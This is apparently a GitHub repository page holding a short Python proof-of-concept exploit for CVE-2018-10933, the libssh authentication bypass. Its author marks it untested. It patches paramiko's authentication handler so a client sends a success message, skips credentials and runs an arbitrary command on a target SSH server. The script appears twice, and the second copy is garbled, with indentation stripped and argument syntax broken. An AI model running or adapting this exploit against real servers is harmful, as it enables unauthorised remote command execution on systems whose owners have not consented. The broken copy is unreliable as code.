ktwombley/CVE-2018-10933-test

## CVE-2018-10933-test
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933

import sys, paramiko
import logging

username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]

new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
        paramiko.common.MSG_USERAUTH_SUCCESS]

def auth_accept(*args, **kwargs):
    return new_auth_accept(*args, **kwargs)

paramiko.auth_handler.AuthHandler._handler_table.update({
    paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})

port = 22
try:
    logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.WarningPolicy)
    client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
    stdin, stdout, stderr = client.exec_command(command)
    print stdout.read(),
finally:
    client.close()
	#!/usr/bin/env python
	# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
	# untested CVE-2018-10933

	import sys, paramiko
	import logging

	username = sys.argv[1]
	hostname = sys.argv[2]
	command = sys.argv[3]

	new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
	paramiko.common.MSG_USERAUTH_SUCCESS]

	def auth_accept(args, *kwargs):
	return new_auth_accept(args, *kwargs)

	paramiko.auth_handler.AuthHandler._handler_table.update({
	paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
	})

	port = 22
	try:
	logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
	client = paramiko.SSHClient()
	client.set_missing_host_key_policy(paramiko.WarningPolicy)
	client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
	stdin, stdout, stderr = client.exec_command(command)
	print stdout.read(),
	finally:
	client.close()